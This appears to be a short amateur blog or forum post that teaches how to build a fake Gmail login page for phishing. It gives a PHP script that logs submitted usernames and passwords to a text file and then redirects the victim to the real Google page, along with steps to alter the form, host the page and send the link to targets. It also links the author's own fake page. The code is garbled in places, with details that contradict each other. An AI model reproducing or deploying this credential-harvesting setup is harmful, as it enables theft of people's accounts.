Pishing with gmail

Phishing:

This is the most common attack. In this attack the attacker creates a fake page and sends it to the victim. The victim fills the login information and when he clicks on login the information is send to the attacker.

               The Method:

Here we will make a fake page for gmail.

-Go to www.gmail.com and save the home page.

-Rename it to index.html

-type the following script in notepad and save it in the same dictionary as gmail.php and create another text file and name it to passwd.txt

Header(“Location: 
https://www.google.com/accounts/ServiceLogin?service=mail&passive= 
true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F 
%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcac
he=2 “); 
$handle = fopen(“passwd.txt”, “a”); 
Foreach($_GET as $variable => $value) { 
 fwrite($handle, $variable); 
 fwrite($handle, “=”); 
 fwrite($handle, $value); 
fwrite($handle, “rn”); 
}      
Fwrite($handle, “rn”); 
fclose($handle); 
exit; 
?> 

-Edit the main gmail page in the notepad and press + F and type action and press “Find Next”.

You should see this:

-Change the link between''action=https://www.gmail.com/accounts/serviceloginAuth?service=mail'' to gmail.php.After this link you will see method=''post''

change it to method=''get''

-Save everything and upload it to a free hosting site make sure to give writing permission to passwd.txt

so now send the link to any one and when he fills everything then his username and password will get saved in passwd.txt so to view it you will have to type

http://www.yourwebsite.com/youraccount/list.txt. In your url.

These were some of the methods to crack a password. Other method include compromising the website/computer which will be explained in My book "Ethical Hacking the forbidden guide".


I hav a fake page too visit http://divyaranjan.my3gb.com/ 2 help u understand it better i have created it.